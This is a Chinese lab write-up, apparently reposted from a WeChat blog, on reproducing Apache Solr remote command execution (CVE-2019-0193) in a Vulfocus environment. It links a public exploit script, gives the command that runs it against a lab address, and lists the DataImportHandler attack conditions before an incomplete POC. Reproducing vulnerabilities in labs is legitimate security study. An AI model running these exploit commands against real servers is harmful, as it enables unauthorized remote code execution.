Solrs搜索&Shrio鉴权&Log4j日志&CVE历史漏洞

原文链接: https://mp.weixin.qq.com/s?__biz=Mzk3NTIyOTA0OQ==&mid=2247485223&idx=1&sn=7cadef856d0360ed2983ea9bd473a955

Solrs搜索&Shrio鉴权&Log4j日志&CVE历史漏洞

原创 朝阳 泷羽Sec-朝阳 2025-07-13 13:26

Solr:(Vulfocus复现)

主要基于HTTP和Apache Lucenne实现的全文搜索服务器

Solr

(
Vulfocus
复现
)

主要基于HTTP和
Apache
Lucene
实现的全文搜索服务器。

历史漏洞:https
://
avd
.
aliyun
.
com
/
search
?
q
=
Solr

黑盒特征:图标及端口
8393

1、远程命令执行漏洞(CVE-2019-0193)

Apache
Solr
5.0.0
版本至
8.3.1

https
://
github
.
com
/
jas502n
/
solr_rce

D
:
\
Python27
\python
.
exe solr_rce
.
py http
://
123.58.236.76
:
50847
 id

这里使用kali进行RCE

python2 solr_rce.py http
://
123.58.236.76
:
50847
 id

Solrs搜索&Shrio鉴权&Log4j日志&CVE历史漏洞

打开环境就是这样一个环境,然后该漏洞对Solr服务版本有要求

Solrs搜索&Shrio鉴权&Log4j日志&CVE历史漏洞

Solrs搜索&Shrio鉴权&Log4j日志&CVE历史漏洞

执行成功,这里要注意一定要确保环境配置正确,并且使用python2环境去运行

2、远程命令执行漏洞(CVE-2019-0193)

Apache
Solr
<
8.2.0
版本

https
://
vulhub
.
org
/

/
environments
/
solr
/
CVE

2019

0193
/

条件
1

Apache
Solr

DataImportHandler
启用了模块
DataImportHandler
(
默认不会被启用
)

条件
2

SolrAdmin
 UI未开启鉴权认证。(默认情况无需任何认证)

选择已有核心后选择
Dataimport
功能并选择debug模式,更改填入以下POC,点击
Execute
withthis
Confuguration

POC:

<
dataSource type
=
“URLDataSource”
/>